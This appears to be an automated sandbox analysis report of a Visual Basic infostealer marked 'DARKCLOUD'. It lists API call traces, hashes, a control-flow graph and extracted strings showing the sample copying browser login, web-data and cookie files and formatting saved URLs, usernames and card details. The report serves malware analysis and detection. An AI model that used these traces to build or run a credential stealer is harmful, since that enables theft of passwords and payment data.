$Pattern$SBJKrTxbGsmfngkQEZstaBFyGmSEblEHt$TsJBjnGaVJTXmCZLPDiQTvFLVphStxldHrXdpGCrMOT$TyByvsFtDEqry$Url: $UserName$Username: $VIQkIQvoVSlzJCqPkbZMOkamREyrplLtg$VZWslqsTuRVoohxyApIZOsnmhgBXMscV$WMGpGpmGqxkNiuhOPRtUqQ$WinSCP 2$ZeTIHNyyHBXWWduBzHihkYbgKwZvGwUkc$anxXwGUGUdnvXPPexWyUMBU$azFPgggmVIbknbWTCKHORYF$bBmqvFpxvKYRy$enumvalues$firebirdsncgfOSuUoKhMPcZZKaHeweYGxAwtGYYSacRrcPIcUQEflashers$foambNcAqYCUqVnIeMZJldXgNbootjack$getbinaryvalue$getstringvalue$jHpwcVpxuYcEiGETWFUrBhJaHFinZvnuzuawSdeontU$keONWvDpKfSIpBeJlhvrDso$lTHVnVqKJBd$mSrrJAMwPlIBizSlvSJnbgNFHPMbtExWOukmyCoPHVWO$nFQicSAaduskqngkTsQuJSQnPJftLtPZbn$nFboeyGjLSXZdNDBKtuiEFuv$oqTEhrlCyZMdapkEdLDclMl$palmitoleicLIAHVjNxTeizPuQabacli$qShfovovyMStOCIvCXCTm$rQYUtUvOvXVHZcAyVluIUULaqDmfiNK$test$vWLeMKukaisAUxbjdBqdvNUMxQIdSGzWuRsblpzmZY$xSlwZiQnRQDmDXCuhsXxuBZdyNiiKUGCJV$xkkmUOcnApOwfnMrtRiLqYdmoMgvcQZQmvQyWtcMFt$xvgYCIjKTvXwKZvOGENTBKktGKyOWJn$ycjdNikmPGuofJBlFuYhiU$~
                                                          • API String ID: 3462107310-1560269496
                                                          • Opcode ID: 1365aa2246e3f2cca95b1da27a375b6b3a465d23d85869c4b91ccfaf227d7d0e
                                                          • Instruction ID: 00fa0c254ae13740f31c86811d7fd109a71ff9e9f309cfcbc8a9d2ad7831d534
                                                          • Opcode Fuzzy Hash: 1365aa2246e3f2cca95b1da27a375b6b3a465d23d85869c4b91ccfaf227d7d0e
                                                          • Instruction Fuzzy Hash: FAC3E5759002189FDB65DF54CD88BDEB7B8BB48304F1082EAE50AA72A0DB745BC5CF94
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0040D4FE
                                                          • __vbaAryConstruct2.MSVBVM60(?,00404E44,00000008,?,?,?,00000000,004030D6), ref: 0040D530
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004030D6), ref: 0040D53F
                                                          • __vbaUbound.MSVBVM60(00000001,00659730,?,?,?,00000000,004030D6), ref: 0040D555
                                                          • __vbaI2I4.MSVBVM60(?,?,?,00000000,004030D6), ref: 0040D55D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040D60A
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0040D627
                                                          • __vbaStrCat.MSVBVM60(004055A8,00659730), ref: 0040D64B
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D659
                                                          • __vbaAryMove.MSVBVM60((En,?,?,0043D064), ref: 0040D682
                                                          • __vbaFreeStr.MSVBVM60 ref: 0040D68E
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 0040D6B9
                                                          • __vbaI2I4.MSVBVM60 ref: 0040D6C1
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D722
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040D73C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040D74D
                                                          • __vbaStrMove.MSVBVM60 ref: 0040D775
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0040D796
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 0040D841
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0040D848
                                                          • __vbaUbound.MSVBVM60(00000001,006597C0), ref: 0040FD78
                                                          • __vbaI2I4.MSVBVM60 ref: 0040FD80
                                                          • __vbaStrCat.MSVBVM60(004055A8,006597C0), ref: 0040FE6E
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FE7C
                                                          • __vbaAryMove.MSVBVM60((En,?,?,0043D064), ref: 0040FEA5
                                                          • __vbaFreeStr.MSVBVM60 ref: 0040FEB1
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 0040FEDC
                                                          • __vbaI2I4.MSVBVM60 ref: 0040FEE4
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF44
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0040FF5E
                                                          • __vbaStrCopy.MSVBVM60 ref: 0040FF6F
                                                          • __vbaStrMove.MSVBVM60 ref: 0040FF97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$CopyUbound$Error$BoundsFreeGenerate$ChkstkConstruct2
                                                          • String ID: (En$0003112E1E301C370D0239140F22070D2F1B3727071C3029123A003F3034$013B331C3810262F625E4C$060C3C001A183021122507021318377420302E12152A393F0D1D032A01146E5A3A2302022A3D1F2C34$1A2D06251C15230809000F0E$1D012D3D2A24701E0A2738$2025241E192613331619310E31353F3F221D0D031F282839071B733A2C30273D002A011E3315173F3C3D3B1D16150300230E213974150830292D372D0736742533$221B0C3A05152A30$2633230215490E3927040209$2F08281B2E3626210D0118786A702B17251D031D0C$302B1433392B041317270137112B0128283E2A2122040C3B1437520A2B3905172C030633431707253D3305022E073404112B142E222F052A72595F61200234777A$33250134392504126B5048$333D2D2928333C13241805111D34572E34002C$3D173E033034353038231F3B223F1617310D09022433080D1D0446717B77092B1B02343F3F0E24070B3A2B2B39041D2417023339283A0F324F6B6765263E114961$3F3A081A0422363F191C0A2E2A043A3D0C17173D050905360B3242766A6A191E1639340426393633391D050600301D323C3630362A3E081161587E6729250D4257$5E7B360D06182A173D16240F110620596B1110093F020E1C3162355D1A22152F28$65620A163C371A0404081A3605092F5C6C3320323636253F1D54156C050B0F263F$6F1B1A19$===============DARKCLOUD===============$AAobmlFZVPxYE$AJMysHCsjcSZXddJaKcAAE$DC-Creds$EoyHOIFPgxTjvtZwjUtMeZQ$NordVPN$Profiles$SUcZtmyBDNhfpgqYTpBGyg$TcDrGNJvvKjh$TsJBjnGaVJTXmCZLPDiQTvFLVphStxldHrXdpGCrMOT$ZYbKuIAfZGABKZsrrWeOuYJ$\Default$\Profiles$\User Data$\User Data\Default\Login Data$anxXwGUGUdnvXPPexWyUMBU$azFPgggmVIbknbWTCKHORYF$jAMBZCJPZkSYHclvQlTnjDT$lTHVnVqKJBd$olUnnsCDZEQcMXkIRjcKrc$oqTEhrlCyZMdapkEdLDclMl$r$wwHIhKTguiXEm$xSlwZiQnRQDmDXCuhsXxuBZdyNiiKUGCJV
                                                          • API String ID: 410742324-2015333847
                                                          • Opcode ID: 31a448adb062f6022ac815a1d79c97102e26fda67437d6ae5e85209e46d6577a
                                                          • Instruction ID: 393a281464da97b9c1e1e85cfeb9b11dbb17ef5791edb26e4e75dbd9ecbfdce2
                                                          • Opcode Fuzzy Hash: 31a448adb062f6022ac815a1d79c97102e26fda67437d6ae5e85209e46d6577a
                                                          • Instruction Fuzzy Hash: 25C3F774901218DFDB24DF60DD88BDAB7B5FB48304F1081EAE54AB72A0DB745A89CF58
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 004345CE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004030D6), ref: 004345FE
                                                          • __vbaUbound.MSVBVM60(00000001,00659730,?,00000000,?,00000000,004030D6), ref: 00434613
                                                          • __vbaI2I4.MSVBVM60(?,00000000,?,00000000,004030D6), ref: 0043461B
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004346B6
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004346D0
                                                          • __vbaStrCat.MSVBVM60(004055A8,00659730), ref: 004346F3
                                                          • __vbaStrMove.MSVBVM60 ref: 004346FE
                                                          • __vbaAryMove.MSVBVM60((En,?,00000000,0043D064), ref: 0043471E
                                                          • __vbaFreeStr.MSVBVM60 ref: 00434727
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 00434751
                                                          • __vbaI2I4.MSVBVM60 ref: 00434759
                                                          • __vbaStrCopy.MSVBVM60 ref: 004347B2
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 004347C6
                                                          • __vbaStrCopy.MSVBVM60 ref: 004347D4
                                                          • __vbaStrMove.MSVBVM60 ref: 004347F3
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0043480B
                                                          • __vbaStrMove.MSVBVM60(006E4528), ref: 004348A4
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 004348AB
                                                          • __vbaUbound.MSVBVM60(00000001,006597C0), ref: 00435DBB
                                                          • __vbaI2I4.MSVBVM60 ref: 00435DC3
                                                          • __vbaStrCat.MSVBVM60(004055A8,006597C0), ref: 00435EA7
                                                          • __vbaStrMove.MSVBVM60 ref: 00435EB2
                                                          • __vbaAryMove.MSVBVM60((En,?,00000000,0043D064), ref: 00435ED2
                                                          • __vbaFreeStr.MSVBVM60 ref: 00435EDB
                                                          • __vbaUbound.MSVBVM60(00000001,006E4528), ref: 00435F05
                                                          • __vbaI2I4.MSVBVM60 ref: 00435F0D
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F6C
                                                          • __vbaStrMove.MSVBVM60(00000000), ref: 00435F80
                                                          • __vbaStrCopy.MSVBVM60 ref: 00435F8E
                                                          • __vbaStrMove.MSVBVM60 ref: 00435FAD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$CopyUbound$Error$BoundsFreeGenerate$Chkstk
                                                          • String ID: (En$192E3639033F0303$1E08152C02383D211B080A200F030836$Cookies.json$DEmYVhVfpKtLM$JBLpJcMQUGKeOdjmEdqOvwF$Profiles$\Profiles$\User Data$\User Data\Default\Cookies$d
                                                          • API String ID: 485188857-2150985054
                                                          • Opcode ID: ddc84c3067681ef8b22f21cc7cad60c6979dc4e2a81344d67f8c1fb19ce3b58a
                                                          • Instruction ID: 7559e76cfa8c2e51358e57783d1b0a7060e06a56415cb1bc04387870c2b5d029
                                                          • Opcode Fuzzy Hash: ddc84c3067681ef8b22f21cc7cad60c6979dc4e2a81344d67f8c1fb19ce3b58a
                                                          • Instruction Fuzzy Hash: 40638274D00204DFDB18DFA4ED88AEEB7B5FB48704F20916AE506B72A0DB749985CF58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1498 41c460-41c737 __vbaChkstk __vbaOnError __vbaStrCat __vbaStrMove #712 __vbaStrMove __vbaStrCat __vbaStrMove #716 __vbaVarZero __vbaChkstk * 2 __vbaObjVar __vbaLateMemCall #716 __vbaVarZero __vbaChkstk * 2 __vbaObjVar __vbaLateMemCall 1499 41d393-41d401 __vbaStrCopy __vbaStrToAnsi call 407b48 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 1498->1499 1500 41c73d-41c787 call 434500 __vbaStrCopy call 434340 __vbaFreeStr 1498->1500 1506 41d407-41d4ea __vbaStrToAnsi * 2 call 4079a0 __vbaSetSystemError __vbaStrToUnicode * 2 __vbaVarMove __vbaFreeStrList call 407c10 __vbaSetSystemError #558 1499->1506 1507 41df6e-41dfee call 407b90 __vbaSetSystemError #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 1499->1507 1513 41c78d-41c7b3 call 407d6c __vbaSetSystemError 1500->1513 1506->1507 1522 41d4f0-41d515 call 407c10 __vbaSetSystemError 1506->1522 1515 41dff4-41e05c __vbaStrCopy __vbaStrToAnsi call 407b48 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 1507->1515 1516 41ec8b-41ecba #529 1507->1516 1524 41ccf9-41cd98 call 407d24 __vbaSetSystemError call 434590 #645 __vbaStrMove __vbaStrCmp __vbaFreeStr 1513->1524 1525 41c7b9-41c89a call 434130 __vbaVarMove call 434130 __vbaVarMove call 4341c0 __vbaAryMove __vbaVarCmpEq __vbaVarNot __vbaBoolVarNull 1513->1525 1529 41e062-41e145 __vbaStrToAnsi * 2 call 4079a0 __vbaSetSystemError __vbaStrToUnicode * 2 __vbaVarMove __vbaFreeStrList call 407c10 __vbaSetSystemError #558 1515->1529 1530 41ec4e-41ec85 call 407b90 __vbaSetSystemError #529 1515->1530 1518 41ed8d-41ee5d __vbaFreeVarList __vbaAryDestruct * 4 __vbaFreeVar * 2 __vbaFreeStr __vbaAryDestruct __vbaFreeStr __vbaFreeVar * 2 __vbaFreeStr * 5 1516->1518 1538 41ee77-41ee7f __vbaErrorOverflow 1522->1538 1539 41d51b-41d559 __vbaI2I4 1522->1539 1549 41d38e 1524->1549 1550 41cd9e-41cde5 call 434500 __vbaStrCopy call 434340 __vbaFreeStr 1524->1550 1557 41c8a0-41ccf1 call 42bf40 __vbaVarMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCat __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrCopy __vbaStrMove call 42ddc0 __vbaVarCat * 8 __vbaStrVarMove __vbaStrMove __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1525->1557 1558 41ccf4 1525->1558 1529->1530 1551 41e14b-41e170 call 407c10 __vbaSetSystemError 1529->1551 1530->1516 1539->1507 1548 41d55f-41d7ee __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaVarCmpEq * 2 __vbaVarOr __vbaVarNot __vbaBoolVarNull 1539->1548 1553 41df62-41df69 1548->1553 1554 41d7f4-41da8c __vbaChkstk * 2 __vbaVarIndexLoad __vbaI4Var __vbaFreeVar __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrCopy __vbaStrMove call 42ddc0 __vbaInStrVar * 2 __vbaVarOr __vbaBoolVarNull __vbaFreeStrList __vbaFreeVarList 1548->1554 1549->1516 1569 41cdeb-41ce11 call 407d6c __vbaSetSystemError 1550->1569 1551->1538 1565 41e176-41e1b4 __vbaI2I4 1551->1565 1554->1553 1593 41da92-41daac 1554->1593 1557->1558 1558->1513 1565->1530 1574 41e1ba-41e5a4 __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarCat __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarCat __vbaVarMove __vbaFreeVarList __vbaChkstk * 2 __vbaVarIndexLoad __vbaVarMove __vbaVarCmpEq * 2 __vbaVarOr __vbaVarCmpEq __vbaVarOr __vbaVarCmpEq __vbaVarOr __vbaBoolVarNull 1565->1574 1583 41d332-41d388 call 407d24 __vbaSetSystemError call 434590 #529 1569->1583 1584 41ce17-41cf64 call 434130 __vbaVarMove call 434130 __vbaStrMove __vbaStrCat __vbaStrMove call 434130 __vbaStrMove __vbaStrCat __vbaVarMove __vbaFreeStrList call 4341c0 __vbaAryMove __vbaVarCmpEq __vbaVarNot __vbaBoolVarNull 1569->1584 1579 41e5a6 1574->1579 1580 41e5ab-41e788 __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrCopy __vbaStrMove call 42ddc0 __vbaInStrVar * 2 __vbaVarOr __vbaBoolVarNull __vbaFreeStrList __vbaFreeVarList 1574->1580 1585 41ec42-41ec49 1579->1585 1580->1585 1620 41e78e-41e863 __vbaChkstk * 2 __vbaVarIndexLoad __vbaI4Var __vbaFreeVar 1580->1620 1583->1549 1626 41cf6a-41d327 call 42bf40 __vbaVarMove __vbaStrCat __vbaVarCat * 8 __vbaStrVarMove __vbaStrMove __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrErrVarCopy __vbaStrMove __vbaStrCopy __vbaStrMove __vbaStrCat __vbaStrMove call 41ee80 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 1584->1626 1627 41d32d 1584->1627 1593->1538 1598 41dab2-41df5f __vbaStrErrVarCopy __vbaStrMove call 432370 __vbaAryMove __vbaFreeStr call 42bf40 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCat __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrCopy __vbaStrMove call 42ddc0 __vbaVarCat * 8 __vbaStrVarMove __vbaStrMove __vbaFreeStrList __vbaFreeVarList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1593->1598 1598->1553 1620->1538 1624 41e869-41ec3f __vbaStrErrVarCopy __vbaStrMove call 432370 __vbaAryMove __vbaFreeStr call 42bf40 __vbaStrMove __vbaStrCat __vbaVarCat * 5 __vbaStrVarMove __vbaStrMove __vbaFreeVarList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 41ee80 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList __vbaStrCopy call 42ecb0 __vbaStrMove __vbaStrCopy __vbaStrMove call 42ddc0 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 1620->1624 1624->1585 1626->1627 1627->1569
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,00411B3E,?,0043D040,?), ref: 0041C47E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0041C4AE
                                                          • __vbaStrCat.MSVBVM60(\LoggraNoUCYctgwnrtnRFCefIupAVHcOBQqsTNNMrZheterostracan,00673F04), ref: 0041C4D4
                                                          • __vbaStrMove.MSVBVM60 ref: 0041C4E2
                                                          • #712.MSVBVM60(?,Login Data,Web Data,00000001,000000FF,00000000), ref: 0041C505
                                                          • __vbaStrMove.MSVBVM60(?,Login Data,Web Data,00000001,000000FF,00000000), ref: 0041C513
                                                          • __vbaStrCat.MSVBVM60(\WebData,00673F04,?,Login Data,Web Data,00000001,000000FF,00000000), ref: 0041C52B
                                                          • __vbaStrMove.MSVBVM60(?,Login Data,Web Data,00000001,000000FF,00000000), ref: 0041C536
                                                          • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,Login Data,Web Data,00000001,000000FF,00000000), ref: 0041C551
                                                          • __vbaVarZero.MSVBVM60(?,Login Data,Web Data,00000001,000000FF,00000000), ref: 0041C563
                                                          • __vbaChkstk.MSVBVM60 ref: 0041C5AA
                                                          • __vbaChkstk.MSVBVM60 ref: 0041C5D9
                                                          • __vbaObjVar.MSVBVM60(?,CopyFile,00000002), ref: 0041C611
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 0041C618
                                                          • #716.MSVBVM60(?,Scripting.FileSystemObject,00000000), ref: 0041C647
                                                          • __vbaVarZero.MSVBVM60 ref: 0041C659
                                                          • __vbaChkstk.MSVBVM60 ref: 0041C6A0
                                                          • __vbaChkstk.MSVBVM60 ref: 0041C6CF
                                                          • __vbaObjVar.MSVBVM60(?,CopyFile,00000002), ref: 0041C707
                                                          • __vbaLateMemCall.MSVBVM60(00000000), ref: 0041C70E
                                                          • __vbaStrCopy.MSVBVM60(?), ref: 0041C765
                                                            • Part of subcall function 00434340: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0043438E
                                                            • Part of subcall function 00434340: __vbaAryMove.MSVBVM60(?,?,004030D6), ref: 004343AB
                                                            • Part of subcall function 00434340: __vbaLbound.MSVBVM60(00000001,?), ref: 004343B7
                                                            • Part of subcall function 00434340: __vbaUbound.MSVBVM60(00000001,?), ref: 004343C5
                                                            • Part of subcall function 00434340: __vbaAryLock.MSVBVM60(?,?), ref: 004343E6
                                                            • Part of subcall function 00434340: __vbaGenerateBoundsError.MSVBVM60 ref: 00434405
                                                            • Part of subcall function 00434340: #644.MSVBVM60(00000000), ref: 00434427
                                                            • Part of subcall function 00434340: __vbaAryUnlock.MSVBVM60(?), ref: 00434430
                                                            • Part of subcall function 00434340: __vbaSetSystemError.MSVBVM60(?,?,-00000001,?,?), ref: 0043444E
                                                            • Part of subcall function 00434340: __vbaAryLock.MSVBVM60(?,?), ref: 0043445C
                                                          • __vbaFreeStr.MSVBVM60(?,?), ref: 0041C787
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0041C7A6
                                                          • __vbaVarMove.MSVBVM60(?,00000000), ref: 0041C7E7
                                                          • __vbaAryMove.MSVBVM60(?,00000064,?,00000002), ref: 0041C847
                                                          • __vbaVarCmpEq.MSVBVM60(00000008,00008008,?), ref: 0041C87A
                                                          • __vbaVarNot.MSVBVM60(?,00000000), ref: 0041C888
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041C88F
                                                          • __vbaVarMove.MSVBVM60(?,00000000), ref: 0041C8CD
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041C8E5
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041C8FF
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041C910
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041C92A
                                                          • __vbaStrCat.MSVBVM60(Url : ,00000000), ref: 0041C93C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041C971
                                                          • __vbaStrMove.MSVBVM60 ref: 0041C999
                                                          • __vbaStrCopy.MSVBVM60(?,?), ref: 0041C9E1
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CA09
                                                          • __vbaVarCat.MSVBVM60(?,?,00000008,?,?), ref: 0041CA58
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041CA6D
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041CA82
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041CA94
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041CAA9
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041CABE
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041CAD0
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041CAE5
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041CAEC
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CAF9
                                                          • __vbaFreeStrList.MSVBVM60(00000008,?,?,?,?,?,?,00000000,00000000), ref: 0041CB39
                                                          • __vbaFreeVarList.MSVBVM60(0000000B,?,?,?,?,?,?,?,?,?,?,?), ref: 0041CB91
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041CBC6
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041CBD7
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041CC27
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041CC2E
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CC3C
                                                          • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041CC49
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CC57
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041CC63
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CC71
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,00000000), ref: 0041CC7D
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CC8B
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041CC97
                                                          • __vbaStrMove.MSVBVM60 ref: 0041CCA4
                                                          • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,00000000), ref: 0041CCEB
                                                          • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041CEE2
                                                            • Part of subcall function 004341C0: __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004342AC
                                                            • Part of subcall function 004341C0: __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6,0041CF00), ref: 004342D9
                                                            • Part of subcall function 004341C0: __vbaAryDestruct.MSVBVM60(00000000,?,0043431C,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 00434315
                                                          • __vbaAryMove.MSVBVM60(?,?,?,00000003), ref: 0041CF11
                                                          • __vbaVarCmpEq.MSVBVM60(?,00008008,?), ref: 0041CF44
                                                          • __vbaVarNot.MSVBVM60(?,00000000), ref: 0041CF52
                                                          • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041CF59
                                                          • __vbaVarMove.MSVBVM60(?,00000000), ref: 0041CF97
                                                          • __vbaStrCat.MSVBVM60(Name on Card: ,00000000), ref: 0041CFAF
                                                          • __vbaVarCat.MSVBVM60(?,?,00000008), ref: 0041D03B
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041D050
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041D065
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041D077
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041D08C
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041D0A1
                                                          • __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041D0B3
                                                          • __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041D0C8
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041D0CF
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D0DC
                                                          • __vbaFreeVarList.MSVBVM60(00000009,00000008,?,?,?,?,?,?,?,?), ref: 0041D123
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041D13E
                                                          • __vbaStrMove.MSVBVM60(?), ref: 0041D158
                                                          • __vbaStrErrVarCopy.MSVBVM60(?), ref: 0041D162
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D170
                                                          • __vbaStrCopy.MSVBVM60 ref: 0041D181
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D1A9
                                                          • __vbaStrCat.MSVBVM60(Card Type: ,00000000), ref: 0041D1BA
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041D1E3
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041D1EA
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D1F8
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041D204
                                                          • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041D234
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0041D23B
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D249
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 0041D256
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041D264
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000,?,00000000), ref: 0041D270
                                                          • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041D27D
                                                          • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041D2D9
                                                          • __vbaStrCat.MSVBVM60(===============DARKCLOUD===============,00000000), ref: 0041D2F4
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D302
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 0041D30E
                                                          • __vbaStrMove.MSVBVM60 ref: 0041D31B
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041D327
                                                          • __vbaSetSystemError.MSVBVM60(?), ref: 0041D345
                                                            • Part of subcall function 00434590: __vbaSetSystemError.MSVBVM60(?,0041CD2E,00000064), ref: 0043459C
